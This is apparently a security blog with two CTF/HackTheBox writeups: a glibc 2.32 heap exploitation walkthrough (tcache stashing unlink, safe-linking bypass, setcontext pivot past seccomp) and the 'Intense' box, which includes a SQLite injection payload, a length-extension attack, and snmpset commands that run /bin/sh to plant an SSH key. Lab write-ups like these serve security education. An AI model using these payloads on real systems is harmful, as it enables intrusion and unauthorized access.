Fastbins can just be ignored due to the allocation size ranges and the fact that we can't change global_max_fast due to the custom patch. 
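To make the size argument concrete, here is a minimal sketch of how request sizes map to chunk sizes on 64-bit glibc. The constants are the stock defaults (an assumption, since the challenge libc is patched), and `classify` is a helper name made up for this illustration.

```python
SIZE_SZ = 8                 # 64-bit size_t
MALLOC_ALIGN_MASK = 0xF     # chunks are 16-byte aligned
MINSIZE = 0x20
MAX_FAST_CHUNK = 0x80       # default global_max_fast on 64-bit (assumed unchanged)
MAX_TCACHE_CHUNK = 0x410    # default limit while mp_.tcache_bins == 64


def request2size(req: int) -> int:
    """Chunk size glibc uses for a malloc(req) request."""
    return max(MINSIZE, (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)


def classify(req: int) -> str:
    """Hypothetical helper: which fast path a request could hit by default."""
    size = request2size(req)
    if size <= MAX_FAST_CHUNK:
        return "fastbin"
    if size <= MAX_TCACHE_CHUNK:
        return "tcache-eligible"
    return "beyond default tcache"


smallest = request2size(0x101)   # smallest request the binary accepts
largest = request2size(0x2000)   # largest request the binary accepts
print(hex(smallest), classify(0x101))
print(hex(largest), classify(0x2000))
```

Every chunk the program can hand out is therefore at least 0x110 bytes, well above the default fastbin limit.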

Tcachebins (or at least the original ones that are placed within the 0x280 tcache_perthread_struct) can be used, as long as you do not allocate - this is a key concept! You can also use malloc() to wipe the struct as a way to help you during your heap massage (Ex. if you want to leave a permanent chunk in between two chunks that would otherwise coalesce).

By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against poison null byte where it checks the size header compared to the prev_size header and ensures that they are the same before back coalescing. However, this time, we cannot just forge some headers easily like in Player2 via a heap leak to beat the unlink check. We will have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bin (as each unique sized chunk in largebin has 2 sets of pointers, with the bottom two being fd_nextsize and bk_nextsize to help it maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques, 2.29 off by null bypass (like many pwnable writeups, Chinese CTF players often document some of the coolest and most obscure techniques, but Google Translate should suffice).

An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer uses a single byte to store each tcache count; it now uses uint16_t. Hence, if we can place chunks in around the 0x1420 size range into the tcache_perthread_struct, the memset will not be able to wipe the tcache count (or the pointer). Some of you may recall that the tcache count did not matter before as long as you had a pointer in the tcache_perthread_struct (as I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now, there are sanity checks against such behavior; this is why we need to allocate potential chunks for the tcache bin that has its count placed outside the memset range.
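The 0x1420 figure can be checked with a little arithmetic. The sketch below assumes the stock 2.32 layout (64 `uint16_t` counts followed by 64 entry pointers) and that the wipe covers 0x280 bytes from the start of the struct; the function names are made up for illustration.

```python
TCACHE_DEFAULT_BINS = 64
COUNTS_BYTES = 2 * TCACHE_DEFAULT_BINS   # uint16_t counts[64] -> 0x80 bytes
WIPE_LEN = 0x280                         # bytes cleared by the malloc wrapper (assumed)
MINSIZE = 0x20
MALLOC_ALIGNMENT = 0x10


def tcache_index(chunk_size: int) -> int:
    """Same formula as glibc's csize2tidx."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


def count_offset(chunk_size: int) -> int:
    """Offset of the (possibly out-of-bounds) count slot inside the struct."""
    return 2 * tcache_index(chunk_size)


def entry_offset(chunk_size: int) -> int:
    """Offset of the (possibly out-of-bounds) entry pointer inside the struct."""
    return COUNTS_BYTES + 8 * tcache_index(chunk_size)


def survives_wipe(chunk_size: int) -> bool:
    """True when both the count and the pointer sit past the wiped region."""
    return count_offset(chunk_size) >= WIPE_LEN and entry_offset(chunk_size) >= WIPE_LEN


def smallest_surviving_size() -> int:
    size = MINSIZE
    while not survives_wipe(size):
        size += MALLOC_ALIGNMENT
    return size


print(hex(smallest_surviving_size()))          # first size whose count is not wiped
print(hex(count_offset(0x1510)), hex(entry_offset(0x1510)))
```

The count slot is the binding constraint here: entry pointers already fall outside the wiped region at index 64, while counts only do so from index 0x140 onwards. Such indices are only accepted once mp_.tcache_bins has been enlarged.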

In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.

By overwriting that with a large value (such as a libc address), we can place larger chunks into tcache and bypass the wipe.

Normally, this type of write makes me think of an unsorted or largebin attack. However, since 2.28, unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30, largebin attack has been hardened against, but how2heap still shows a potential way to perform this attack (I took a closer look at the newer version of this attack after the CTF; though I did not end up testing whether this would actually work in this challenge, it could potentially have offered a much easier alternative with the simpler setup). Another way to achieve this write in glibc 2.32 is to perform what is known as the tcache stashing unlink attack, which I learned from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.

The relevant source for this attack is here:

Basically, when we have chunks inside a specific smallbin, causing malloc to pull from this smallbin will trigger a transfer of chunks into the respective tcache bin afterwards. Notice the point about bck = tc_victim->bk and bck->fd = bin during the stashing process. By corrupting the bk pointer of a smallbin chunk, we can write a libc address into a selected address + 0x10. We must take note to do this only when tcache is one spot away from being filled so the stashing procedure can end immediately afterwards, avoiding any potential corruption. Most writeups would first start out with 6 chunks in the tcache bin and then 2 chunks in the smallbin, so you can pull out one smallbin chunk and corrupt the bk of the last one (as smallbins are FIFO structures with chunks removed from the tail), trigger the stash process, and have it end immediately as tcache would become full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin; 1 to pull out, 6 to stash, and the final one to stash and write. Regardless of what happens, this respective smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ versions of this attack to get an arbitrary address allocation or an arbitrary address allocation and a write of a libc address somewhere in memory.
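The 8-chunk variant can be modelled with a toy memory map. This is only a simulation of the list operations described above, not glibc code; all addresses are invented, and the tcache count is assumed to start at 0 because of the wipe.

```python
FD, BK = 0x10, 0x18      # offsets of fd / bk inside a malloc_chunk
TCACHE_FILL = 7          # default mp_.tcache_count


def smallbin_insert(mem, bin_addr, chunk):
    """Insert at the head of the bin, as done when sorting out of unsorted."""
    fwd = mem[bin_addr + FD]
    mem[chunk + BK] = bin_addr
    mem[chunk + FD] = fwd
    mem[fwd + BK] = chunk
    mem[bin_addr + FD] = chunk


def malloc_from_smallbin(mem, bin_addr, tcache_count=0):
    """Take the tail chunk, then stash the rest into tcache without checks."""
    victim = mem[bin_addr + BK]
    bck = mem[victim + BK]
    if mem[bck + FD] != victim:                 # only the first chunk is checked
        raise RuntimeError("smallbin double linked list corrupted")
    mem[bin_addr + BK] = bck
    mem[bck + FD] = bin_addr
    stashed = []
    while tcache_count < TCACHE_FILL and mem[bin_addr + BK] != bin_addr:
        tc_victim = mem[bin_addr + BK]
        bck = mem[tc_victim + BK]
        mem[bin_addr + BK] = bck
        mem[bck + FD] = bin_addr                # unchecked write of a libc address
        stashed.append(tc_victim)
        tcache_count += 1
    return victim, stashed


BIN, TARGET = 0x7F0000001000, 0x7F0000002000    # made-up bin and target addresses
chunks = [0x5000 + i * 0x200 for i in range(8)]  # freed in this order
mem = {BIN + FD: BIN, BIN + BK: BIN}
for c in chunks:
    smallbin_insert(mem, BIN, c)

mem[chunks[-1] + BK] = TARGET                   # corrupt bk of the last inserted chunk
victim, stashed = malloc_from_smallbin(mem, BIN)
print(hex(victim), len(stashed), hex(mem[TARGET + 0x10]))
```

In this model the first freed chunk is returned, seven chunks are stashed, and the bin address lands at TARGET + 0x10 exactly as the tcache becomes full, so the loop stops before it dereferences anything else.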

One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.
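As a quick illustration of the formula, here is a minimal sketch of the two directions of safe linking. The addresses are invented stand-ins for a heap chunk and for __free_hook; `protect` and `reveal` mirror the glibc macro names.

```python
def protect(pos: int, ptr: int) -> int:
    """Value stored in memory: pos is the address of the fd field itself."""
    return (pos >> 12) ^ ptr


def reveal(pos: int, stored: int) -> int:
    """Inverse operation; XOR with the same shifted position."""
    return (pos >> 12) ^ stored


fd_field = 0x55555555B6C0        # hypothetical address of the freed chunk's fd
free_hook = 0x7FFFF7FC5E40       # hypothetical address of __free_hook

poisoned = protect(fd_field, free_hook)   # what we write over the fd
print(hex(poisoned), hex(reveal(fd_field, poisoned)))

# The last chunk in a list stores an obfuscated NULL, which leaks the heap page.
print(hex(protect(fd_field, 0) << 12))
```

With a heap leak, computing the value to write during the tcache poison is a single XOR.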

Lastly, since this writeup requires a lot of heap massaging involving smallbin and largebin, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out too bad when writing this exploit, as a lot of it just relied on some intuition and checking in a debugger.

Exploit Development:

I recommend closely following along with a debugger, as sometimes my explanations might be wrong or I might have misexplained a small step due to the complexity of this exploit.

To start off, I wrote some helper functions:

Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.

Several chunks are allocated, and then three chunks of different sizes (but same largebin) are freed into the unsorted bin. A chunk larger than all three was then requested, causing a new chunk to be pulled from wilderness and the 3 unsorted chunks to be sorted into the same largebin in order, with 2 sets of pointers filled for each due to them having unique sizes. Notice how the middle-sized one has its first set of pointers aligned at an address ending in a null byte; this is purposeful as we will later forge a fake size header over the first set of pointers here, and can perform partial overwrites on other chunks with dangling pointers with just a single null byte from the alloc function to align and pass the unlink check. 

Note that I didn't fill the middle chunk with as many characters since I will forge a fake chunk header there soon as it will be the target to back coalesce onto; as the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the 1 qword afterwards) as glibc unlink performs additional operations when the previous chunk is of large size and has non null fd_nextsize pointers.

Next, Asphyxia freed the chunk before the chunk in the middle largebin, causing it to back coalesce (while also leaving the 2 sets of pointers behind for me to use) and go into unsorted. Another allocation is made so that the first set of pointers left behind can be used to fake a chunk header, and the next set of pointers can be used as part of the way to beat the unlink checks (I chose a fake size chunk of 0x2150).

Then, we cleared out the unsorted bin, and recovered the other two largebins, to then build an unsorted chain. Order of freeing now matters here for unsorted bins. We want to have the chunk underneath the fake headers to be in the middle, so its address in the unsorted chain can be used and changed to the fake chunk with just a null overwrite (as they are all in the 0x......7XX range). 

Now we want to recover the 0x440 chunk in unsorted and write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing on the 0x460 chunk; in order to preserve its pointers, we will back coalesce it with a chunk before it. Then, an allocation can be made to place a null byte to change the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also manage to get some heap pointers in these two chunks for a heap leak due to how unlink works. Notice how the forged chunk has the perfect pointer chain setup to pass the unlink check.

Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks I would have overlapped. I then allocated a few more chunks of 0x110 size (which I will use later for the tcache stash unlink attack), with some additional fake chunk metadata to allow me to free a fake 0x1510 chunk later, which I plan to use for the tcache poison attack. My final 0x110 chunk allocated is meant to just prevent consolidation later depending on the order of how I build my smallbin chain and I cannot use it as this extra spot is crucial for the later massage.

I triggered the poison null byte after setting the correct prev_size metadata and created a massive unsorted bin that overlapped a lot of memory after I freed the poisoned chunk.

Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.

Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.

Since the libc address for unsorted bins started with a null byte, I had to find a way to get a largebin pointer allocated into the beginning of my chunk data for libc leak. I achieved this by first aligning the unsorted bin with one of my chunk data addresses, then allocated a very large chunk (greater than unsorted size) to trigger largebin activity, hence providing me with a libc leak. Two operations were also performed to fix some of the chunks' size metadata that got corrupted and overwritten during these heap manipulations (but they were unnecessary as I had to change all of them in the next stage of the exploit). I lastly allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that will work with free() nicely.

A general technique I used above and one that I will use from now on to fake sizes or forge metadata is one where I allocate one to two massive chunks from the unsorted bin to reach the specified destination, write the data upon allocation, and then free it in the opposite order of allocation to back coalesce it and restore the state of the unsorted bin.

In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need to have 15 0x110 chunks to be freed. The first 7 can be freed into tcache, and the next 8 will be freed into unsorted (in which we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into smallbin, and have the chunk inserted into the 0x110 smallbin last be overlapped to have its bk pointer tampered with; this way we can still stash attack without crashing and have the final chunk entering tcache perform the write. At the current stage, we only have 0x110 chunks in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10, and we will need 5 more. Here is the program chunk array as of now:

The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9. 

To free up the other chunks, I performed the technique mentioned above (allocate one to two chunks, write the correct size or just spam with 0x21 sizes, and recoalesce back to restore unsorted chunk) on chunks 3 and 5 to make them isolated 0x20 sized chunks (size for index 8 has already been changed in the last 0x110 allocation), on chunk 9 to make it into size 0x1510, and applied it one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted bin. I will also free 0, which will add one more unsorted chunk into the unsorted bin, but luckily it didn't raise any new issues I had to deal with in the heap massage later. We should have 6 free spots at this point; 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.

Now, I added 5 more 0x110 chunks. This cannot be done with 5 direct allocations. Rather, I performed the allocations (and some frees) in such a way that the unsorted bin created from freeing chunk 0 runs out after three 0x110 chunk allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6 chunk's data (which we control), and allocated a 0x110 chunk from there (providing us with an overlap over a potential smallbin). Since we know that this last chunk will go into unsorted before smallbin, I had to ensure that it will not coalesce with the neighboring unsorted chunk, so I freed a previous 0x110 chunk and allocated one more from unsorted to act as a guard chunk; the nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about their return.

One thing to note is the reason for which I chose index 6 to be the one to overlap and overwrite the last smallbin bk. I mentioned it above in the code comments, but it's because there was a 0x110 chunk after it and it was also the first of the three chunks I kept in memory.

At this stage, we have 15 chunks of 0x110 size: index 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep this number of chunks for the tcache and smallbin frees, I closely considered the following rules I know (which you can see from debugging):

1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)

2. 12 will back coalesce into the large unsorted if not entered into tcache.

3. 0, 3 is a chain

4. 8, 10 is a chain

5. 5 is on top of the big unsorted chunk

6. 2, 4 are isolated

7. 7 has the potential to go into unsorted and merge with a smallbin

8. 18 must be the last one into the smallbin

Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.
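The free order can be sanity-checked against the rules with a short script. This is only a sketch of my reading of the rules: a "chain" is taken to mean physically adjacent chunks in the listed order, and chunks that land in tcache are assumed never to coalesce.

```python
free_order = [14, 16, 3, 10, 5, 12, 7, 17, 2, 13, 15, 0, 8, 4, 18]
TCACHE_SLOTS = 7

tcache = free_order[:TCACHE_SLOTS]      # first 7 frees fill the 0x110 tcache bin
unsorted = free_order[TCACHE_SLOTS:]    # the remaining 8 go to the unsorted bin

# Neighbouring pairs implied by rules 1, 3 and 4 (assumed adjacency).
adjacent_pairs = [(12, 13), (13, 14), (14, 15), (15, 16), (16, 17), (0, 3), (8, 10)]

# Rules 2, 5 and 7: these would merge with another free chunk if left in unsorted.
must_be_tcache = {12, 5, 7}


def coalescing_pairs(unsorted_chunks, pairs):
    """Adjacent pairs that would merge because both ends are in unsorted."""
    in_unsorted = set(unsorted_chunks)
    return [(a, b) for a, b in pairs if a in in_unsorted and b in in_unsorted]


problems = coalescing_pairs(unsorted, adjacent_pairs)
print("tcache:", tcache)
print("unsorted:", unsorted)
print("would coalesce:", problems)
```

Under these assumptions no two neighbours are ever both in the unsorted bin, the three risky chunks all go to tcache, and index 18 is the last chunk inserted into the smallbin.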

Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.

Since we don't have edit anymore, I had to free index 6 into unsorted, and then allocate for it to get it back and perform the overwrite over the index 18 0x110 small chunk to write a libc address into mp_.tcache_bins. Making another request into the smallbin should trigger the stash. 0x110 smallbin is also corrupted afterwards and you should avoid allocating from it.

Between index 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.

Then, I pulled from a chunk from the large unsorted chunk we had to overlap into what was index 9, and following the pointer obfuscation rules, changed it to __free_hook.

Now, we must decide on how to escape the seccomp filter. Of course, we will need an open/read/write rop chain; however, how can we pivot with only control over __free_hook (which implies we only control rdi)? 

One idea that we had was setcontext, which is a well known function to use as a stack pivot.

However, starting around libc-2.29 (?) it relied on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which exists in many (newer?) glibc versions) that allows us to control rdx from rdi and call an address relative to rdx. In this libc, it was the following:

mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
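To show how this gadget can hand control to setcontext, here is a rough sketch of a freed chunk's layout. It is not the exploit's code: all addresses are placeholders, rdx is simply pointed back at the same chunk, and the 0xa0/0xa8 offsets for rsp and the pushed rcx are the usual x86-64 ucontext offsets, which should be confirmed in the target libc's disassembly.

```python
import struct

# Assumed setcontext offsets relative to rdx (verify against the real libc).
OFF_RSP = 0xA0   # mov rsp, [rdx + 0xa0]
OFF_RCX = 0xA8   # mov rcx, [rdx + 0xa8]; push rcx; ... ret


def build_pivot_chunk(chunk_addr, setcontext_gadget, new_rsp, first_ret, size=0x100):
    """Contents of the chunk passed to free() once __free_hook is the COP gadget."""
    buf = bytearray(size)
    rdx = chunk_addr                                        # reuse the chunk as the context
    struct.pack_into("<Q", buf, 0x08, rdx)                  # mov rdx, [rdi + 8]
    struct.pack_into("<Q", buf, 0x20, setcontext_gadget)    # call [rdx + 0x20]
    struct.pack_into("<Q", buf, OFF_RSP, new_rsp)           # stack after the pivot
    struct.pack_into("<Q", buf, OFF_RCX, first_ret)         # pushed, then popped by ret
    return bytes(buf)


# Placeholder values purely for illustration.
CHUNK = 0x55555555C000
SETCONTEXT_GADGET = 0x7FFFF7E1F0DD
ROP_CHAIN = CHUNK + 0x200
RET_GADGET = 0x7FFFF7DF2679

payload = build_pivot_chunk(CHUNK, SETCONTEXT_GADGET, ROP_CHAIN, RET_GADGET)
print(payload[:0x30].hex())
```

Because rcx is pushed and then immediately consumed by the final ret, execution continues at first_ret with rsp equal to new_rsp, so the rest of the chain can be placed at new_rsp.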

This makes it relatively trivial as we can just set up the heap for the ROP (take care of the one push rcx instruction setcontext executes). I went for an mprotect to change the heap to rwx, and then pivoted to shellcode on the heap to open, read, write, and exit. Due to my previous spamming of 0x21 metadata, I was not able to allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:

Final Exploit:

Do note that in this writeup, I nop'd out the sleep for the sake of local testing. However, running it with the provided ynetd binary (as the CTF server is no longer up) with a 3 second timeout for each option added onto my script still had it over 10 minutes under the sigalarm limit, so it should have been fine during the actual competition scenario.

Concluding thoughts:

While this challenge was overall pretty decent as it showed some up to date glibc tricks, I felt that some of the elements were unnecessary and added artificial difficulty. This challenge could have been just as difficult conceptually if it allowed for 2-3 more allocation spots (rather than force players who have the correct plans to rewrite their exploit several times), and combining a sigalarm with a 2 second sleep in the main menu didn't add any value. Additionally, while the custom patch made in this libc makes sense and did contribute to overall quality, I do see libc patching happening more often and hope CTF authors do not abuse it to create extremely contrived heap note problems.

Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all those teammates that worked with me in DiceGang, which placed 4th overall!

Saturday, November 14, 2020

Intense HacktheBox Writeup

 

Intense was a hard box involving some web exploitation techniques such as sqlite injection and hash extension attack, snmp exploitation, as well as an easy pwnable for root. Overall, I thought sokafr did a great job with this box.

To begin, our initial port scan revealed the following ports from masscan:

22/tcp  open   ssh     syn-ack ttl 63

80/tcp  open   http    syn-ack ttl 63

161/tcp closed snmp    reset ttl 63

Opening up port 80, we see the following:


It provides us with guest:guest as credentials, as well as a link to the zipped source code, which we can download. Inside, you can find some templates and other misc. info, but the most important files are the 4 python files of this flask app (which uses a sqlite database): utils.py, lwt.py, app.py, and admin.py.

Some important takeaways from this include the following observations:

The user information from here is stored in the sqlite database, based on the data for username and secret (which is the sha256 hash of your input for password). The usage of query_db() and its behavior makes it safe from sqli at this login point.

The session is built and checked in the following manner at some of the following functions:

To summarize, the cookie is composed of an “auth” cookie, which is composed of 2 base64 portions separated by a period. The first portion is based on the return value of try_login(), which is a dictionary of username and secret. Using this dictionary, it formats the session as username=username;secret=hash;. Afterwards, the cookie gets a signature from the previous data by taking the digest of sha256(SECRET + data) where SECRET is a random bytestring of random length between 8 and 15; this is the second portion of the cookie. Then both the data and this signature are encoded and returned for the cookie value of “auth.” In many subsequent operations, get_session() is called, which calls parse_session(), which first verifies the contents of the data with the signature. Interestingly enough, if you find a way to bypass this verification, the way parse_session() behaves would allow you to append data to replace keys that get already set in the loop beforehand.
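The scheme described above can be sketched in a few lines. This is a reconstruction from the description, not the application's code: `make_cookie`, `parse_cookie`, and `sign` are names chosen for illustration, and the real parser may differ in details.

```python
import base64
import hashlib
import os
import random

# Random secret of random length between 8 and 15 bytes, as described.
SECRET = os.urandom(random.randrange(8, 16))


def sign(data: bytes) -> bytes:
    """Signature is the digest of sha256(SECRET + data)."""
    return hashlib.sha256(SECRET + data).digest()


def make_cookie(username: str, secret_hash: str) -> str:
    data = f"username={username};secret={secret_hash};".encode()
    return base64.b64encode(data).decode() + "." + base64.b64encode(sign(data)).decode()


def parse_cookie(cookie: str):
    """Verify the signature, then let later keys overwrite earlier ones."""
    b64_data, b64_sig = cookie.split(".")
    data, sig = base64.b64decode(b64_data), base64.b64decode(b64_sig)
    if sign(data) != sig:
        return None
    session = {}
    for field in data.split(b";"):
        if b"=" in field:
            key, value = field.split(b"=", 1)
            session[key] = value          # a duplicate key replaces the old value
    return session


cookie = make_cookie("guest", "ab12")
print(parse_cookie(cookie))
```

The detail that matters later is the loop at the end: if validly signed data contains `username` twice, the last occurrence wins.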

Becoming admin lets you interact with some interesting functionality:

There's a ridiculously obvious lfi here. Now, would there be any endpoints that would allow us to extract data to become admin?

Let's take a look at a feature the guest user has access to, the submitmessage() function:

You're restricted to a 140 byte message, and there are some blacklisted words. However, now query_db isn't even really used "correctly," as the application is just directly formatting your input in, leading to an obvious sqlite injection. One thing to note is that it doesn't really show you the result besides success or failure, so this is a clear case of an error-based injection. I just used load_extension when the comparison in my error brute force is false; this would return an authorization error (plus the extension won't even exist). My teammate Bianca had another interesting way to error brute this, relying on passing bad inputs to json_extract when the comparison fails to trigger an error.

Messing around briefly in db-fiddle, I will be basing my script off the following sqli template:

injection: ' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--

query: insert into messages values ('' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--')
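A linear brute force built on this template could look roughly like the sketch below. It is not the original script: the oracle is a callable that should submit the payload and return True on success, and here it is replaced by a local stand-in (`fake_oracle`, with an invented table row) so the logic can be run offline.

```python
import re
import string

TEMPLATE = ("' or (select case when (select substr({col},{pos},1) from users "
            "limit 1 offset 0) = '{ch}' then 'W' else load_extension('L', 0x1) end));--")
MAX_MESSAGE_LEN = 140


def build_payload(col: str, pos: int, ch: str) -> str:
    payload = TEMPLATE.format(col=col, pos=pos, ch=ch)
    if len(payload) > MAX_MESSAGE_LEN:
        raise ValueError("payload exceeds the message length limit")
    return payload


def brute(oracle, col: str, length: int, charset: str) -> str:
    """Recover `length` characters of `col`, one position at a time."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle(build_payload(col, pos, ch)):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no candidate matched at position {pos}")
    return recovered


# Stand-in for the HTTP request: pretends the first row is admin / deadbeef.
FAKE_ROW = {"username": "admin", "secret": "deadbeef"}


def fake_oracle(payload: str) -> bool:
    col, pos, ch = re.search(r"substr\((\w+),(\d+),1\).*? = '(.)' then", payload).groups()
    return FAKE_ROW[col][int(pos) - 1] == ch


print(brute(fake_oracle, "username", 5, string.ascii_lowercase))
print(brute(fake_oracle, "secret", 8, string.hexdigits.lower()))
```

Against the real target, the oracle would post the payload to the message endpoint and treat a non-error response as a match; the payload stays under the 140 byte limit even for two-digit positions.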

I wrote the following script to retrieve the admin username and hash with a simple linear brute, as the username probably will just be admin, and the hex charset is small enough:

I ended up receiving the following hash: f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105

But it's not crackable with any wordlist or rule combination I have... this is where the way the application signs sessions and checks them comes in. Remember how it signed it with the secret in front before hashing? Under these conditions, sha256 is vulnerable to the hash extension attack (also known as a length extension attack). This post explains this attack much better, as I just ended up relying on the hash_extender tool. In our case, we know the hash function, the data, as well as the original signature, so we have all the conditions ready for this attack, in which we append data to generate a valid signature without knowing the secret (and appending the data can make us admin since the session parser doesn't check for duplicates). As for the attack, the general gist is that the signature is the internal state of the hash after processing the secret, the data, and the padding. If you set the hashing algorithm state back to the signature's value, the algorithm continues to hash your appended data from there, and this will produce a valid result!
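The only part of the forged message that depends on the unknown secret is the SHA-256 padding, which depends on its length. The sketch below builds the candidate data strings for each possible secret length; computing the matching signature still requires resuming SHA-256 from the known digest (which hashlib does not expose, hence tools like hash_extender). The session string and appended field are illustrative.

```python
import struct


def sha256_padding(message_len: int) -> bytes:
    """Padding SHA-256 appends to a message of message_len bytes."""
    zeros = (55 - message_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", message_len * 8)


def forged_data(original: bytes, append: bytes, secret_len: int) -> bytes:
    """Data the server will see: original + glue padding + our extension."""
    return original + sha256_padding(secret_len + len(original)) + append


def candidates(original: bytes, append: bytes, secret_lengths=range(8, 16)):
    """One forged data string per possible secret length (8 to 15 bytes)."""
    return [(n, forged_data(original, append, n)) for n in secret_lengths]


original = b"username=guest;secret=<hash>;"   # placeholder session data
append = b";username=admin;"                  # illustrative extension
for secret_len, data in candidates(original, append):
    print(secret_len, len(data))
```

Each candidate is then paired with the extended signature and tried as a cookie until the server accepts one, which also reveals the secret's length.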

Since the secret has a variable length, I wrote the following script to bruteforce a valid session:

Now, with a valid session, we can go to the admin functions and perform lfi.

With some requests, I also noticed the user flag (and the source code for the pwnable) in the user directory with payload ../../../../../../../../../home/user.

Recalling our earlier enumeration, I remember the snmp port. Pulling out /etc/snmp/snmpd.conf, I see the following:

Seeing the rw community string made me immediately think of rce over snmp, which is very well documented here. To quote the article:

The SNMP community string is essentially a plaintext password that allows access to a device’s statistics and configuration.

Since there is a length limit to the payloads (255 chars for command) with nsExtend related operations, I ended up generating a shorter ssh key to give myself ssh access as the Debian-snmp user with the following commands:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1VxdqPOpZvaJtuvtTMZJlchmQCLw8cC0tvD79eSlaL0hsS0XRFRaAKFf55UP1SarbED+teHFQUPbLa6uJlBxJQrPLQfujmo6su7P2jGPDZrwxIgKA7Om8cUvLXuNdHrTVwze68z7QBCIi6m1ofHBvZJOdWMt6O0idpybWefz7Cw== root@kaliVM > /dev/shm/w"'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "cat /dev/shm/w > /var/lib/snmp/.ssh/authorized_keys"'

Remember to trigger it each time with: snmpwalk -v 2c -c SuP3RPrivCom90 10.10.10.195 nsExtendObjects

When you lfi the source code of the pwnable (note_server.c) earlier on, you can see that it opened its port on 5001, so we can port forward it out:

ssh -N -L 5001:127.0.0.1:5001 Debian-snmp@intense.htb -i key

However, we still need libc and the binary, and from the lfi on passwd, we know Debian-snmp shell is /bin/false. So I ended up popping a shell with the following commands so I can transfer files out (we had to use nohup to prevent snmp from hanging and then crashing, and some fiddling was required for the commands to work):

